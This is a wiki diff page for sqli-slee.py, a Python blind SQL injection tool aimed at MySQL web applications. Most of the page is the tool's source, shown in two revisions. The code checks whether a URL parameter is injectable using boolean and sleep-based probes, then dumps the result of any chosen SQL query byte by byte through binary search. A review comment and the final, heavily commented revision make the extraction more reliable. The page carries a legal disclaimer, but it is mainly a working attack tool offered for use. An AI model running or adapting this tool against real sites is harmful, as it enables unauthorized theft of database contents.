
Difference between revisions of "SQL injection/mysqli-blindutils/sqli-slee.py"

 
(9 intermediate revisions by 4 users not shown)
Line 1: Line 1:
{{info|<center>This script uses time and boolean based blind [[SQL injection]] to obtain the desired information from MySQL database.</center>}}
+
{{info|<center>This [[python]] script uses time and [[boolean enumeration|boolean]] based blind [[SQL injection]] to obtain the desired information from [[MySQL]] [[database]]s.</center>}}
 +
 
 +
<font size="-2">Special thanks to [[User:Dilon|Dilon]] for this tool.</font>
  
 
=Info=
 
=Info=
 +
{{main|mysqli-blindutils}}
 
The syntax of this script is:
 
The syntax of this script is:
   python bsqli.py -u [url] -i [injection]
+
   python sqli-slee.py -u [url] -i [injection]
 
==Example==
 
==Example==
   python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"
+
   python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()"
  
 
==Disclaimer==
 
==Disclaimer==
Line 12: Line 15:
 
=Source=
 
=Source=
 
{{code|text= <source lang="python">
 
{{code|text= <source lang="python">
#!/usr/bin/python
+
#!/usr/bin/python2.7
 
   
 
   
import sys,re,urllib,urllib2,string,time
+
import sys,re,urllib2,string,time
 
from optparse import OptionParser
 
from optparse import OptionParser
 
from urllib2 import Request,urlopen,URLError,HTTPError
 
from urllib2 import Request,urlopen,URLError,HTTPError
 
   
 
   
 
def request(URL):
 
def request(URL):
  user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
+
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
  req = urllib2.Request(URL, None, user_agent)
+
    req = urllib2.Request(URL, None, user_agent)
  
  try:
+
    try:
    request = urllib2.urlopen(req)
+
        request = urllib2.urlopen(req)
  
  except HTTPError, e:
+
    except HTTPError, e:
    print('[!] The server couldnt fulfill the request.')
+
        print('[!] The server couldnt fulfill the request.')
    print('[!] Error code: ' + str(e.code))
+
        print('[!] Error code: ' + str(e.code))
    sys.exit(1)
+
        sys.exit(1)
  
  except URLError, e:
+
    except URLError, e:
    print('[!] We failed to reach a server.')
+
        print('[!] We failed to reach a server.')
    print('[!] Reason: ' + str(e.reason))
+
        print('[!] Reason: ' + str(e.reason))
    sys.exit(1)
+
        sys.exit(1)
  
  return len(request.read())
+
    return len(request.read())
 
   
 
   
 
def value(URL):
 
def value(URL):
  target = 0
+
    target = 0
  end = 0
+
    end = 0
  next_maybe = 0
+
    next_maybe = 0
  floor = 0
+
    floor = 0
  ceiling = 255
+
    ceiling = 255
  maybe = int(ceiling)/2
+
    maybe = int(ceiling)/2
  
  while(end != 9):
+
    while(end != 9):
    if(is_what(URL, maybe, '>')):
+
        if(is_what(URL, maybe, '>')):
      floor = maybe
+
            floor = maybe
      next_maybe = int(maybe + ((ceiling - floor)/2))
+
            next_maybe = int(maybe + ((ceiling - floor)/2))
  
    elif(is_what(URL, maybe, '<')):
+
        elif(is_what(URL, maybe, '<')):
      ceiling = maybe
+
            ceiling = maybe
      next_maybe = int(maybe - ((ceiling - floor)/2))
+
            next_maybe = int(maybe - ((ceiling - floor)/2))
  
    elif(is_what(URL, maybe, '=')):
+
        elif(is_what(URL, maybe, '=')):
      return chr(maybe)
+
            return chr(maybe)
  
    maybe = next_maybe
+
        maybe = next_maybe
    end += 1
+
        end += 1
  
  return 'done'
+
    return 'done'
 
   
 
   
 
def is_what(URL, maybe, op):
 
def is_what(URL, maybe, op):
  if(sqli_type == 'boolean'):
+
    if(sqli_type == 'boolean'):
    ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
+
        ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
    if(TrueResponse == ValueResponse):
+
        if(TrueResponse == ValueResponse):
      return 1
+
            return 1
    else:
+
        else:
      return 0
+
            return 0
  elif(sqli_type == 'time'):
+
    elif(sqli_type == 'time'):
    start = time.time()
+
        start = time.time()
    ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
+
        ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
    elapsed_time = (time.time() - start)
+
        elapsed_time = (time.time() - start)
    if (elapsed_time > 2):
+
        if (elapsed_time > 2):
      return 1
+
            return 1
    else:
+
        else:
      return 0
+
            return 0
 
   
 
   
 
def vuln_check(URL):
 
def vuln_check(URL):
  print('[+] Checking site...')
+
    print('[+] Checking site...')
 
+
  global TrueResponse
+
  TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
+
  FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
+
  
  if(TrueResponse != FalseResponse):
+
    global TrueResponse
     print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
+
     TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
     return 'boolean'
+
     FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
  else:
+
    start = time.time()
+
    SleepResponse = request(URL + '%20and%20sleep(5)--+')
+
    elapsed_time = (time.time() - start)
+
  
     if(elapsed_time > 5):
+
     if(TrueResponse != FalseResponse):
      print('[+] Site seems to be vulnerable to time based blind SQL injection.')  
+
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
      return 'time'
+
        return 'boolean'
 
     else:
 
     else:
      print('[!] Seems like site isnt vulnerable to blind SQL injection.')
+
        start = time.time()
      sys.exit(1)
+
        SleepResponse = request(URL + '%20and%20sleep(5)--+')
 +
        elapsed_time = (time.time() - start)
 +
 
 +
        if(elapsed_time > 5):
 +
            print('[+] Site seems to be vulnerable to time based blind SQL injection.')
 +
            return 'time'
 +
        else:
 +
            print('[!] Seems like site isnt vulnerable to blind SQL injection.')
 +
            sys.exit(1)
 
   
 
   
 
def main():
 
def main():
  print('''
+
    print('''
        Auto BSQLi tool for MySQL
+
                Auto BSQLi tool for MySQL
        ''')
+
                ''')
 
   
 
   
  usage = 'usage: %prog -u <target> -i <injection>'
+
    usage = 'usage: %prog -u <target> -i <injection>'
  parser = OptionParser(usage=usage)
+
    parser = OptionParser(usage=usage)
  parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
+
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
  parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
+
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 
   
 
   
  (options, args) = parser.parse_args()
+
    (options, args) = parser.parse_args()
  if(options.URL and options.INJECTION):
+
    if(options.URL and options.INJECTION):
    URL = options.URL
+
        URL = options.URL
    INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
+
        INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
  else:
+
    else:
    print('[!] Missing url or injection parameter.')
+
        print('[!] Missing url or injection parameter.')
    print('[!] Use --help.')
+
        print('[!] Use --help.')
    sys.exit(1)
+
        sys.exit(1)
 
   
 
   
  global sqli_type
+
    global sqli_type
  sqli_type = vuln_check(URL)
+
    sqli_type = vuln_check(URL)
  position = 1
+
    position = 1
  dump = ''
+
    dump = ''
  print('[+] Dumping data...')
+
    print('[+] Dumping data...')
  
  while(1):
+
    while(1):
    if(sqli_type == 'boolean'):
+
        if(sqli_type == 'boolean'):
      letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
+
            letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
    elif(sqli_type == 'time'):
+
        elif(sqli_type == 'time'):
      letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
+
            letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
  
    if(letter == 'done'):
+
        if(letter == 'done'):
      break
+
            break
  
    dump = dump + letter
+
        dump = dump + letter
    position += 1
+
        position += 1
  
  if(dump):
+
    if(dump):
    print('[+] Data: ' + dump)
+
        print('[+] Data: ' + dump)
  else:
+
    else:
    print('[!] No data dumped. Check your injection.')
+
        print('[!] No data dumped. Check your injection.')
 
   
 
   
 
if __name__ == "__main__":
 
if __name__ == "__main__":
  main()
+
    main()
 
</source>}}
 
</source>}}
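Review bot: The reworked vuln_check on the new side of the second hunk still decides "boolean" from a single true/false pair of body lengths, so any page whose length varies between loads (a timestamp, a CSRF token, an ad slot) is reported as boolean-injectable and every byte of the dump is then noise; a second known-true probe lets the oracle check itself, e.g. `Stable = int(request(URL + '%20AND%2043%20like%2043--+'))` followed by `if(TrueResponse == Stable and TrueResponse != FalseResponse):`. In the time-based branch of the same function `SleepResponse` is assigned and never read; the `request(...)` call can stand alone. The rest of the hunk lines are re-indentation from two to four spaces plus the `python2.7` shebang and the dropped `urllib` import, which introduce no new behaviour.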

Latest revision as of 02:57, 21 November 2012

This python script uses time and boolean based blind SQL injection to obtain the desired information from MySQL databases.

Special thanks to Dilon for this tool.

Info

Main article: mysqli-blindutils

The syntax of this script is:

 python sqli-slee.py -u [url] -i [injection]

Example

 python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

The end-user is liable for his or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python2.7
 
import re
import socket
import string
import sys
import time
import urllib2
from optparse import OptionParser
from urllib2 import Request, urlopen, URLError, HTTPError
 
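def request(URL, timeout=30):
    """Fetch URL and return the length of the response body in bytes.

    The boolean oracle compares this length between probes, so the whole
    body is read. A browser-like User-Agent is sent because some targets
    serve different content (or block) on urllib2's default agent.

    Args:
        URL: fully-formed URL including the injected payload.
        timeout: socket timeout in seconds. It must exceed the longest
            injected pause (sleep(5) in vuln_check) or a genuine time-based
            hit is reported as a network failure; without any timeout a
            stalled target hangs the tool forever.

    Returns:
        int: number of bytes in the response body.

    Exits the process with status 1 on an HTTP error status, a transport
    failure, or a timeout while reading the body.
    """
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}
    req = urllib2.Request(URL, None, headers)

    # HTTPError is a subclass of URLError, so it has to be caught first.
    try:
        response = urllib2.urlopen(req, timeout=timeout)
    except HTTPError as e:
        print('[!] The server couldnt fulfill the request.')
        print('[!] Error code: ' + str(e.code))
        sys.exit(1)
    except URLError as e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: ' + str(e.reason))
        sys.exit(1)

    # A timeout hit while receiving the body surfaces as socket.timeout,
    # not URLError, under Python 2.7.
    try:
        return len(response.read())
    except socket.timeout:
        print('[!] Timed out reading the response.')
        sys.exit(1)
    finally:
        response.close()  # release the socket; every probe opens a new one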
 
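def value(URL, oracle=None):
    """Recover one byte of the injected expression by binary search.

    URL already ends in ``... ascii(substr((<query>) from N for 1))`` (or the
    time-based variant); each probe appends a comparison operator and a
    candidate byte and asks the oracle whether the target byte is above,
    below or equal to it.

    Args:
        URL: request URL up to, but not including, the comparison operator.
        oracle: callable ``(URL, candidate, op) -> truthy`` answering the
            comparison for ``op`` in ``'>'``, ``'<'``, ``'='``; defaults to
            the module-level ``is_what``. Exposed so the search itself can be
            exercised without a live target.

    Returns:
        str: the recovered byte as a one-character string, or the sentinel
        ``'done'`` when no byte in 1..255 matched within nine probes. Byte 0
        is never probed, and MySQL yields ASCII('') = 0 past the end of the
        string, so ``'done'`` is how the caller detects the end of the data.
    """
    if oracle is None:
        oracle = is_what

    # The target byte lies in [floor, ceiling). The bound is 256 so that 255
    # is a reachable probe; with 255 the search stalled one short of it and
    # a 0xFF byte ended the dump early.
    floor = 0
    ceiling = 256
    maybe = ceiling // 2  # floor division: a float here would break chr()

    # Eight halvings of 256 pin any byte in 1..255; the ninth round is slack.
    for _ in range(9):
        if oracle(URL, maybe, '>'):
            floor = maybe
            maybe = floor + (ceiling - floor) // 2
        elif oracle(URL, maybe, '<'):
            ceiling = maybe
            maybe = ceiling - (ceiling - floor) // 2
        elif oracle(URL, maybe, '='):
            return chr(maybe)
        # None of the three comparisons held: the oracle answered
        # inconsistently (noisy response); probe the same candidate again.

    return 'done'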
 
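def is_what(URL, maybe, op):
    """Ask the target whether the byte under extraction satisfies ``op maybe``.

    Reads the module globals set by ``main``/``vuln_check``: ``sqli_type``
    selects the oracle and ``TrueResponse`` is the body length of a
    known-true boolean probe.

    Args:
        URL: request URL ending just before the comparison operator.
        maybe: candidate byte value, 0..255.
        op: one of ``'>'``, ``'<'``, ``'='``.

    Returns:
        int: 1 if the comparison held, else 0. An unknown ``sqli_type`` also
        yields 0 (the original fell off the end and returned None).
    """
    probe = str(URL) + str(op) + str(maybe)

    if sqli_type == 'boolean':
        # True iff the page has exactly the length of the known-true baseline.
        # Pages whose length varies between loads (timestamps, tokens) defeat
        # this oracle; vuln_check's screening is the only protection.
        return 1 if int(request(probe + '--+')) == TrueResponse else 0

    if sqli_type == 'time':
        # The payload becomes sleep((<cond>)*2): the server pauses 2 s on
        # true and 0 s on false. The threshold equals the pause, so network
        # latency is what pushes a true answer over it; a slow link can push
        # a false answer over it as well, so keep the link quiet while dumping.
        start = time.time()
        request(probe + ')*2)--+')
        return 1 if (time.time() - start) > 2 else 0

    return 0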
 
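def vuln_check(URL):
    """Classify the injection point as boolean-blind or time-blind.

    Sets the module global ``TrueResponse`` (body length of a known-true
    probe) that ``is_what`` compares against in boolean mode.

    Args:
        URL: target URL with the injection point at its end, e.g. ``?id=1%27``.

    Returns:
        str: ``'boolean'`` or ``'time'``.

    Exits with status 1 when neither oracle responds.
    """
    print('[+] Checking site...')

    global TrueResponse
    true_probe = URL + '%20AND%2043%20like%2043--+'
    TrueResponse = int(request(true_probe))
    FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
    # A second known-true probe guards against pages whose length changes on
    # every load (timestamps, CSRF tokens, ad slots); a single true/false
    # pair would report them as boolean-injectable and the dump would be
    # noise. Only a stable baseline that differs from the false probe counts.
    TrueAgain = int(request(true_probe))

    if TrueResponse == TrueAgain and TrueResponse != FalseResponse:
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
        return 'boolean'

    # Boolean oracle unusable: fall back to timing. sleep(5) has to show up
    # as more than 5 s of wall-clock time (network latency on top of the pause).
    start = time.time()
    request(URL + '%20and%20sleep(5)--+')
    elapsed_time = time.time() - start

    if elapsed_time > 5:
        print('[+] Site seems to be vulnerable to time based blind SQL injection.')
        return 'time'

    print('[!] Seems like site isnt vulnerable to blind SQL injection.')
    sys.exit(1)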
 
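def main():
    """CLI entry point: parse -u/-i, detect the blind-SQLi mode, dump the result.

    The injected expression is read one byte at a time with
    ``ascii(substr((<query>) from <pos> for 1))`` until ``value`` reports
    ``'done'`` (byte 0, i.e. past the end of the result). Sets the module
    global ``sqli_type`` read by ``is_what`` and ``_probe_url``.
    """
    print('''
                Auto BSQLi tool for MySQL
                ''')

    usage = 'usage: %prog -u <target> -i <injection>'
    parser = OptionParser(usage=usage)
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')

    options, _args = parser.parse_args()
    if not (options.URL and options.INJECTION):
        print('[!] Missing url or injection parameter.')
        print('[!] Use --help.')
        sys.exit(1)

    URL = options.URL
    # Under Python 2 optparse hands back the raw argv byte string; calling
    # .encode("utf8") on it first decodes it as ASCII and raises on any
    # non-ASCII byte. Only a unicode object needs encoding before quoting.
    raw_injection = options.INJECTION
    if not isinstance(raw_injection, bytes):
        raw_injection = raw_injection.encode("utf8")
    INJECTION = urllib2.quote(raw_injection)

    global sqli_type
    sqli_type = vuln_check(URL)
    print('[+] Dumping data...')

    dump = ''
    position = 1
    while True:
        letter = value(_probe_url(URL, INJECTION, position))
        if letter == 'done':
            break
        dump += letter
        position += 1

    if dump:
        print('[+] Data: ' + dump)
    else:
        print('[!] No data dumped. Check your injection.')


def _probe_url(URL, INJECTION, position):
    """Build the URL prefix that extracts byte ``position`` in the current ``sqli_type``.

    The returned URL ends just before the comparison operator that ``is_what``
    appends; in time mode the opened parentheses are closed by its ``')*2)--+'``.
    """
    substr = 'ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))'
    if sqli_type == 'time':
        return URL + '%20and%20sleep((select%20' + substr
    return URL + '%20and%20' + substr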
 
if __name__ == '__main__':
    # Only run the tool when executed as a script; importing the module
    # performs no requests.
    main()